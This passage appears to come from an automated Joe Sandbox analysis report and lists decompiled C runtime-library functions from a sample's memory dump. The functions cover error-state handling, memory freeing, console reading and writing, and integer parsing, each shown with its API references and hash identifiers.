_free.LIBCMT ref: 0042DAA8
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e322479f6d272e97834159b243fefc2c18358481c796309de48fd23de3ce1d6e
Instruction ID: f39f85e548e27a7fd2e2f226a5f72e8e2a47bdc48d09de71d789fe9d45b9e626
Opcode Fuzzy Hash: e322479f6d272e97834159b243fefc2c18358481c796309de48fd23de3ce1d6e
Instruction Fuzzy Hash: C411E732B092312FD61167B77C82D2B251E9BC13BDBA5033BF525866E2DD6C8C41811D

Uniqueness

Uniqueness Score: -1.00%

Function 0042DB67 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0042DB67(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x4542a8; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0042CBD2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00430BC8(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E0042CBD2(__eflags,  *0x4542a8, _t18);
							if(__eflags != 0) {
								E0042D686(_t18, 0x456af4);
								E0042E2C2(0);
								goto L13;
							} else {
								_t13 = 0;
								E0042CBD2(__eflags,  *0x4542a8, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E0042CBD2(0,  *0x4542a8, 0);
							_push(0);
							L9:
							E0042E2C2();
							goto L4;
						}
					}
				} else {
					_t18 = E0042CB93(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x4542a8; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x0042db72
0x0042db74
0x0042db79
0x0042db7c
0x0042db9a
0x0042db9d
0x0042dba2
0x0042dba4
0x00000000
0x0042dba6
0x0042dbb2
0x0042dbb6
0x0042dbb8
0x0042dbdd
0x0042dbdf
0x0042dbf8
0x0042dbff
0x00000000
0x0042dbe1
0x0042dbe1
0x0042dbea
0x0042dbef
0x00000000
0x0042dbef
0x0042dbba
0x0042dbba
0x0042dbba
0x0042dbc3
0x0042dbc8
0x0042dbc9
0x0042dbc9
0x00000000
0x0042dbce
0x0042dbb8
0x0042db7e
0x0042db84
0x0042db88
0x0042db95
0x00000000
0x0042db8a
0x0042db8d
0x0042dc07
0x0042dc07
0x0042db8f
0x0042db8f
0x0042db8f
0x0042db91
0x0042db91
0x0042db91
0x0042db8d
0x0042db88
0x0042dc0a
0x0042dc12
0x0042dc1b

APIs

GetLastError.KERNEL32(?,?,?,0042C13A,0042E2E8,?,?,0042B259), ref: 0042DB6C
_free.LIBCMT ref: 0042DBC9
_free.LIBCMT ref: 0042DBFF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0042C13A,0042E2E8,?,?,0042B259), ref: 0042DC0A

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e761885221636048d5a5ad860b7e5ab11b3d85c35585895c360455e864461025
Instruction ID: 04b7f99e3ff72e544f41c763df6d8ffc96668f84c4378a7cb5f2752a7fce098e
Opcode Fuzzy Hash: e761885221636048d5a5ad860b7e5ab11b3d85c35585895c360455e864461025
Instruction Fuzzy Hash: C7110A32B002306FD60127777C96D1B395E9BC13BDBA2033AF425C61E2DDA89C41911D

Uniqueness

Uniqueness Score: -1.00%

Function 0042D8B8 Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0042D8B8(void* __ecx) {
				intOrPtr _t3;
				signed int _t4;
				signed int _t6;
				signed int _t13;
				signed int _t14;
				long _t21;
				signed int _t23;

				_t21 = GetLastError();
				_t3 =  *0x4542a8; // 0x6
				_t27 = _t3 - 0xffffffff;
				if(_t3 == 0xffffffff) {
					L4:
					_t4 = E0042CBD2(__eflags, _t3, 0xffffffff);
					__eflags = _t4;
					if(_t4 != 0) {
						_t23 = E00430BC8(1, 0x364);
						__eflags = _t23;
						if(__eflags != 0) {
							_t6 = E0042CBD2(__eflags,  *0x4542a8, _t23);
							__eflags = _t6;
							if(_t6 != 0) {
								E0042D686(_t23, 0x456af4);
								E0042E2C2(0);
								_t14 = _t23;
							} else {
								_t14 = 0;
								__eflags = 0;
								E0042CBD2(0,  *0x4542a8, 0);
								_push(_t23);
								goto L10;
							}
						} else {
							_t14 = 0;
							E0042CBD2(__eflags,  *0x4542a8, 0);
							_push(0);
							L10:
							E0042E2C2();
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t13 = E0042CB93(_t27, _t3);
					if(_t13 == 0) {
						_t3 =  *0x4542a8; // 0x6
						goto L4;
					} else {
						_t1 = _t13 + 1; // 0x1
						asm("sbb ebx, ebx");
						_t14 =  ~_t1 & _t13;
					}
				}
				SetLastError(_t21);
				return _t14;
			}

0x0042d8c2
0x0042d8c4
0x0042d8c9
0x0042d8cc
0x0042d8e8
0x0042d8eb
0x0042d8f0
0x0042d8f2
0x0042d905
0x0042d909
0x0042d90b
0x0042d925
0x0042d92a
0x0042d92c
0x0042d94b
0x0042d952
0x0042d95a
0x0042d92e
0x0042d92e
0x0042d92e
0x0042d937
0x0042d93c
0x00000000
0x0042d93c
0x0042d90d
0x0042d90d
0x0042d916
0x0042d91b
0x0042d93d
0x0042d93d
0x0042d942
0x0042d8f4
0x0042d8f4
0x0042d8f4
0x0042d8ce
0x0042d8cf
0x0042d8d6
0x0042d8e3
0x00000000
0x0042d8d8
0x0042d8d8
0x0042d8dd
0x0042d8df
0x0042d8df
0x0042d8d6
0x0042d95e
0x0042d968

APIs

GetLastError.KERNEL32 ref: 0042D8BC
_free.LIBCMT ref: 0042D93D
SetLastError.KERNEL32(00000000), ref: 0042D95E

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: af5ca43d36b06da74153fdc4eb34653b68515b53e4e73f6d3b7a12a88ecb92f1
Instruction ID: fd13a51bca09c63e55ee7a3ceb405efec7348a7df11f67cb19c658969ecfc4e1
Opcode Fuzzy Hash: af5ca43d36b06da74153fdc4eb34653b68515b53e4e73f6d3b7a12a88ecb92f1
Instruction Fuzzy Hash: 6611C271B452317FD7102BB6BCC6D2B3A5C8B813EDBA1023BF515961A2DA9C8C85D12D

Uniqueness

Uniqueness Score: -1.00%

Function 00402570 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402570(void* _a4, void* _a8, long _a12, DWORD* _a16) {
				void* _v8;
				long _v12;

				if(ReadConsoleW(_a4, _a8, _a12, _a16, 0) == 0) {
					_v8 = E00405880();
					if(_v8 != 0) {
						if(ReadFile(_a4, _v8, _a12,  &_v12, 0) != 0) {
							 *_a16 = MultiByteToWideChar(GetConsoleCP(), 0, _v8, _v12, _a8, _a12);
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 1;
			}

0x00402590
0x0040259e
0x004025a5
0x004025c5
0x004025ed
0x00000000
0x004025ef
0x00000000
0x004025c7
0x00000000
0x004025a7
0x00000000

APIs

ReadConsoleW.KERNEL32(004042F4,00000000,?,?,00000000,004042F4,00000000), ref: 00402588

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ConsoleRead
String ID:
API String ID: 4169426927-0
Opcode ID: 0576a538fdbb6d1522f5fdc2b4fdf52e0c1c325734f61366cd2f478212d68f15
Instruction ID: ad776290c2c8b3d1d75d02c8d0e61554db8280114e1549c3077a7f750bfb971c
Opcode Fuzzy Hash: 0576a538fdbb6d1522f5fdc2b4fdf52e0c1c325734f61366cd2f478212d68f15
Instruction Fuzzy Hash: 94112AB5600109FFCB44DFA8DD58FAB77B8AB48300F108529BA09D72C0D674DD41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 004432E1 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004432E1(void** _a4) {
				void* _t12;
				void** _t13;

				_t13 = _a4;
				_t12 = WriteConsoleW( *0x454af0,  *_t13, _t13[1], _t13[2], 0);
				if(_t12 == 0 && GetLastError() == 6) {
					E004433B0();
					E00443372();
					_t12 = WriteConsoleW( *0x454af0,  *_t13, _t13[1], _t13[2], _t12);
				}
				return _t12;
			}

0x004432e7
0x00443301
0x00443305
0x00443312
0x00443317
0x00443331
0x00443331
0x00443338

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004432FB
GetLastError.KERNEL32 ref: 00443307

Part of subcall function 004433B0: CloseHandle.KERNEL32(FFFFFFFE,004433FA,?,0044080D,?,00000001,?,00000001,?,0043ED5F,00000000,?,00000001,00000000,00000001), ref: 004433C0

___initconout.LIBCMT ref: 00443317

Part of subcall function 00443372: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004433A1,004407FA,00000001,?,0043ED5F,00000000,?,00000001,00000000), ref: 00443385

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0044332B

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3c50dc2611c418f438f6943f5e5d06f1bccc07f72976975099de4a827d01c002
Instruction ID: a017582992bfaeefbfc3160f7e9d412574246fe0d638fcee7bbc319372030e0c
Opcode Fuzzy Hash: 3c50dc2611c418f438f6943f5e5d06f1bccc07f72976975099de4a827d01c002
Instruction Fuzzy Hash: 42F0F43A100601FBDB211F96EC049477B76FBC9762710842AF99682531CE319C51DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004433C7 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004433C7(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x454af0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E004433B0();
					E00443372();
					_t13 = WriteConsoleW( *0x454af0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x004433e4
0x004433e8
0x004433f5
0x004433fa
0x00443415
0x00443415
0x0044341b

APIs

WriteConsoleW.KERNEL32(?,?,00437AB6,00000000,?,?,0044080D,?,00000001,?,00000001,?,0043ED5F,00000000,?,00000001), ref: 004433DE
GetLastError.KERNEL32(?,0044080D,?,00000001,?,00000001,?,0043ED5F,00000000,?,00000001,00000000,00000001,?,0043F2C4,0043777F), ref: 004433EA

Part of subcall function 004433B0: CloseHandle.KERNEL32(FFFFFFFE,004433FA,?,0044080D,?,00000001,?,00000001,?,0043ED5F,00000000,?,00000001,00000000,00000001), ref: 004433C0

___initconout.LIBCMT ref: 004433FA

Part of subcall function 00443372: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004433A1,004407FA,00000001,?,0043ED5F,00000000,?,00000001,00000000), ref: 00443385

WriteConsoleW.KERNEL32(?,?,00437AB6,00000000,?,0044080D,?,00000001,?,00000001,?,0043ED5F,00000000,?,00000001,00000000), ref: 0044340F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ad3d0874129012a5fa488e05a2f9b5d2914c666d1ffa0642180085e0222092e4
Instruction ID: c345b470a7ec08cada276ecff516c0a35fbce8dd80186b1164ca1024ab7e4eb6
Opcode Fuzzy Hash: ad3d0874129012a5fa488e05a2f9b5d2914c666d1ffa0642180085e0222092e4
Instruction Fuzzy Hash: 1FF0373A000125BBDF121FD1EC08A8B3F25FB457A2B008031FD1985131C731CD20EB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042B3D4 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042B3D4() {

				E0042E2C2( *0x456b10);
				 *0x456b10 = 0;
				E0042E2C2( *0x456b14);
				 *0x456b14 = 0;
				E0042E2C2( *0x4569dc);
				 *0x4569dc = 0;
				E0042E2C2( *0x4569e0);
				 *0x4569e0 = 0;
				return 1;
			}

0x0042b3dd
0x0042b3ea
0x0042b3f0
0x0042b3fb
0x0042b401
0x0042b40c
0x0042b412
0x0042b41a
0x0042b423

APIs

_free.LIBCMT ref: 0042B3DD

Part of subcall function 0042E2C2: HeapFree.KERNEL32(00000000,00000000,?,0042B259), ref: 0042E2D8
Part of subcall function 0042E2C2: GetLastError.KERNEL32(?,?,0042B259), ref: 0042E2EA

_free.LIBCMT ref: 0042B3F0
_free.LIBCMT ref: 0042B401
_free.LIBCMT ref: 0042B412

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f63236a1163c7f06ebf810151bce6863c3de138164318012bde4680e573d725a
Instruction ID: ec88d7911da3b3de4092c22cb16a0f7f0258cbaca22ad495b6f5a4b7bd151ad4
Opcode Fuzzy Hash: f63236a1163c7f06ebf810151bce6863c3de138164318012bde4680e573d725a
Instruction Fuzzy Hash: 44E01ABA601730EA86016F13FC018053A29AB04B127C3516BF4144323BCB3A99119FEE

Uniqueness

Uniqueness Score: -1.00%

Function 0041445B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041445B(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed char _v5;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				intOrPtr* _t82;
				signed int _t84;
				signed int _t86;
				signed int _t90;
				signed int _t91;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed char _t100;
				signed int _t102;
				signed int _t103;
				signed char _t114;
				signed int _t116;
				void* _t117;
				intOrPtr* _t119;
				signed int _t128;
				signed char _t129;
				signed char _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void* _t144;
				signed int _t146;
				intOrPtr* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				if(E00415276( &_a8) == 0) {
					L5:
					_t128 = 0;
					_t150 = 0;
					L6:
					_t82 = _a12;
					if(_t82 != 0) {
						 *_t82 = _a8;
					}
					return _t128;
				}
				_t84 = _a16;
				if(_t84 == 0) {
					L9:
					E0041334C( &_v64, _t144, _a4);
					_t86 = _a8;
					_t149 = 0;
					_v20 = 0;
					_t150 = 0;
					_v48 = _t86;
					L11:
					_t129 =  *_t86;
					_a8 = _t86 + 1;
					_v16 = _t129;
					_v5 = _t129;
					_t90 = E004154DD(_t129, _t149, _t129 & 0x000000ff, 8,  &_v60);
					_t151 = _t151 + 0xc;
					__eflags = _t90;
					if(_t90 != 0) {
						_t86 = _a8;
						goto L11;
					}
					_t91 = _a20 & 0x000000ff;
					_v12 = _t91;
					__eflags = _t129 - 0x2d;
					if(_t129 != 0x2d) {
						__eflags = _t129 - 0x2b;
						if(_t129 != 0x2b) {
							_t146 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v12 = _t91 | 0x00000002;
						L15:
						_t147 = _a8;
						_t129 =  *_t147;
						_t146 = _t147 + 1;
						_v5 = _t129;
						_v16 = _t129;
						_a8 = _t146;
						L17:
						_t135 = _a16;
						__eflags = _t135;
						if(_t135 == 0) {
							L19:
							__eflags = _t129 - 0x30 - 9;
							if(_t129 - 0x30 > 9) {
								__eflags = _t129 - 0x61 - 0x19;
								if(_t129 - 0x61 > 0x19) {
									_t97 = _t129 - 0x41;
									__eflags = _t97 - 0x19;
									if(_t97 > 0x19) {
										_t98 = _t97 | 0xffffffff;
										__eflags = _t98;
									} else {
										_t98 = _t129 + 0xffffffc9;
									}
								} else {
									_t98 = _t129 + 0xffffffa9;
								}
							} else {
								_t98 = _t129 + 0xffffffd0;
							}
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 =  *_t146;
								_t146 = _t146 + 1;
								_v28 = _t99;
								_a8 = _t146;
								__eflags = _t99 - 0x78;
								if(_t99 == 0x78) {
									L35:
									__eflags = _t135;
									if(_t135 == 0) {
										_a16 = 0x10;
									}
									_t100 =  *_t146;
									_v5 = _t100;
									_v16 = _t100;
									_a8 = _t146 + 1;
									L34:
									_t102 = _a16;
									L39:
									asm("cdq");
									_push(_t129);
									_t136 = _t146;
									_v44 = _t102;
									_v40 = _t136;
									_t103 = E00445200(0xffffffff, 0xffffffff, _t102, _t136);
									_v32 = _t129;
									_t131 = _v12;
									_v36 = _t136;
									_t137 = _v5;
									_v24 = _t103;
									_v28 = _t146;
									while(1) {
										__eflags = _t137 - 0x30 - 9;
										if(_t137 - 0x30 > 9) {
											__eflags = _t137 - 0x61 - 0x19;
											if(_t137 - 0x61 > 0x19) {
												__eflags = _t137 - 0x41 - 0x19;
												if(_t137 - 0x41 > 0x19) {
													_t138 = _t137 | 0xffffffff;
													__eflags = _t138;
												} else {
													_t138 = _t137 + 0xffffffc9;
												}
											} else {
												_t138 = _t137 + 0xffffffa9;
											}
										} else {
											_t138 = _t137 + 0xffffffd0;
										}
										_v12 = _t138;
										__eflags = _t138 - 0xffffffff;
										if(_t138 == 0xffffffff) {
											break;
										}
										__eflags = _t138 - _a16;
										if(_t138 >= _a16) {
											break;
										}
										_t116 = _v20;
										_t131 = _t131 | 0x00000008;
										__eflags = _t150 - _t146;
										if(__eflags < 0) {
											L58:
											_v12 = _t138;
											L59:
											_t117 = E004451C0(_v44, _v40, _t116, _t150);
											_t150 = _t146;
											_v20 = _t117 + _v12;
											asm("adc esi, edi");
											L60:
											_t119 = _a8;
											_t146 = _v28;
											_t137 =  *_t119;
											_v16 = _t137;
											_a8 = _t119 + 1;
											continue;
										}
										_t146 = _v24;
										if(__eflags > 0) {
											L52:
											__eflags = _t116 - _t146;
											if(_t116 != _t146) {
												L57:
												_t131 = _t131 | 0x00000004;
												goto L60;
											}
											__eflags = _t150 - _v28;
											if(_t150 != _v28) {
												goto L57;
											}
											__eflags = _t149 - _v32;
											if(__eflags < 0) {
												goto L59;
											}
											if(__eflags > 0) {
												goto L57;
											}
											__eflags = _t138 - _v36;
											if(_t138 <= _v36) {
												goto L59;
											}
											goto L57;
										}
										__eflags = _t116 - _t146;
										if(_t116 < _t146) {
											goto L58;
										}
										goto L52;
									}
									_v12 = _t131;
									E0041521F( &_a8, _v16);
									__eflags = _t131 & 0x00000008;
									if((_t131 & 0x00000008) != 0) {
										_t128 = _v20;
										__eflags = E00413BB7(_v12, _t128, _t150);
										if(__eflags == 0) {
											__eflags = _v12 & 0x00000002;
											if((_v12 & 0x00000002) != 0) {
												_t128 =  ~_t128;
												asm("adc esi, edi");
												_t150 =  ~_t150;
											}
											L72:
											__eflags = _v52;
											if(_v52 != 0) {
												 *(_v64 + 0x350) =  *(_v64 + 0x350) & 0xfffffffd;
											}
											goto L6;
										}
										 *((intOrPtr*)(E0042C135(__eflags))) = 0x22;
										_t114 = _v12;
										__eflags = _t114 & 0x00000001;
										if((_t114 & 0x00000001) != 0) {
											__eflags = _t114 & 0x00000002;
											if((_t114 & 0x00000002) == 0) {
												_t149 = _t149 | 0xffffffff;
												__eflags = _t149;
												_t150 = 0x7fffffff;
											} else {
												_t150 = 0x80000000;
											}
											L69:
											_t128 = _t149;
											goto L72;
										}
										_t128 = _t128 | 0xffffffff;
										_t150 = _t150 | 0xffffffff;
										goto L72;
									}
									_t150 = _t149;
									_a8 = _v48;
									goto L69;
								}
								__eflags = _t99 - 0x58;
								if(_t99 == 0x58) {
									goto L35;
								}
								__eflags = _t135;
								if(_t135 == 0) {
									_a16 = 8;
								}
								E0041521F( &_a8, _v28);
								goto L34;
							}
							__eflags = _t135;
							if(_t135 != 0) {
								L38:
								_t102 = _t135;
								goto L39;
							}
							_t102 = 0xa;
							_a16 = _t102;
							goto L39;
						}
						__eflags = _t135 - 0x10;
						if(_t135 != 0x10) {
							goto L38;
						}
						goto L19;
					}
				}
				if(_t84 < 2) {
					L4:
					 *((intOrPtr*)(E0042C135(_t156))) = 0x16;
					E0042C00E();
					goto L5;
				}
				_t156 = _t84 - 0x24;
				if(_t84 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

0x00414470
0x00414493
0x00414495
0x00414497
0x00414499
0x00414499
0x0041449e
0x004144a3
0x004144a3
0x004144ad
0x004144ad
0x00414472
0x00414477
0x004144ae
0x004144b4
0x004144b9
0x004144bc
0x004144be
0x004144c1
0x004144c3
0x004144cb
0x004144cb
0x004144ce
0x004144db
0x004144de
0x004144e1
0x004144e6
0x004144e9
0x004144eb
0x004144c8
0x00000000
0x004144c8
0x004144ed
0x004144f1
0x004144f4
0x004144f7
0x00414501
0x00414504
0x00414517
0x00000000
0x00414517
0x00000000
0x004144f9
0x004144fc
0x00414506
0x00414506
0x00414509
0x0041450b
0x0041450c
0x0041450f
0x00414512
0x0041451a
0x0041451a
0x0041451d
0x0041451f
0x0041452a
0x0041452e
0x00414530
0x0041453e
0x00414540
0x0041454c
0x0041454e
0x00414550
0x0041455a
0x0041455a
0x00414552
0x00414555
0x00414555
0x00414542
0x00414545
0x00414545
0x00414532
0x00414535
0x00414535
0x0041455d
0x0041455f
0x0041456d
0x0041456f
0x00414570
0x00414573
0x00414576
0x00414578
0x00414599
0x00414599
0x0041459b
0x0041459d
0x0041459d
0x004145a4
0x004145a6
0x004145a9
0x004145af
0x00414594
0x00414594
0x004145b6
0x004145b6
0x004145b7
0x004145b8
0x004145ba
0x004145c3
0x004145c6
0x004145cb
0x004145d0
0x004145d3
0x004145d6
0x004145d9
0x004145dc
0x004145df
0x004145e3
0x004145e5
0x004145f3
0x004145f5
0x00414603
0x00414605
0x0041460f
0x0041460f
0x00414607
0x0041460a
0x0041460a
0x004145f7
0x004145fa
0x004145fa
0x004145e7
0x004145ea
0x004145ea
0x00414612
0x00414615
0x00414618
0x00000000
0x00000000
0x0041461a
0x0041461d
0x00000000
0x00000000
0x0041461f
0x00414622
0x00414625
0x00414627
0x0041464c
0x0041464c
0x0041464f
0x00414657
0x0041465f
0x00414661
0x00414664
0x00414666
0x00414666
0x00414669
0x0041466c
0x0041466f
0x00414672
0x00000000
0x00414672
0x00414629
0x0041462c
0x00414632
0x00414632
0x00414634
0x00414647
0x00414647
0x00000000
0x00414647
0x00414636
0x00414639
0x00000000
0x00000000
0x0041463b
0x0041463e
0x00000000
0x00000000
0x00414640
0x00000000
0x00000000
0x00414642
0x00414645
0x00000000
0x00000000
0x00000000
0x00414645
0x0041462e
0x00414630
0x00000000
0x00000000
0x00000000
0x00414630
0x00414680
0x00414683
0x00414688
0x0041468b
0x00414697
0x004146a7
0x004146a9
0x004146dc
0x004146e0
0x004146e2
0x004146e4
0x004146e6
0x004146e6
0x004146e8
0x004146e8
0x004146ec
0x004146f5
0x004146f5
0x00000000
0x004146ec
0x004146b0
0x004146b6
0x004146b9
0x004146bb
0x004146c5
0x004146c7
0x004146d0
0x004146d0
0x004146d3
0x004146c9
0x004146c9
0x004146c9
0x004146d8
0x004146d8
0x00000000
0x004146d8
0x004146bd
0x004146c0
0x00000000
0x004146c0
0x00414690
0x00414692
0x00000000
0x00414692
0x0041457a
0x0041457c
0x00000000
0x00000000
0x0041457e
0x00414580
0x00414582
0x00414582
0x0041458f
0x00000000
0x0041458f
0x00414561
0x00414563
0x004145b4
0x004145b4
0x00000000
0x004145b4
0x00414567
0x00414568
0x00000000
0x00414568
0x00414521
0x00414524
0x00000000
0x00000000
0x00000000
0x00414524
0x004144f7
0x0041447c
0x00414483
0x00414488
0x0041448e
0x00000000
0x0041448e
0x0041447e
0x00414481
0x00000000
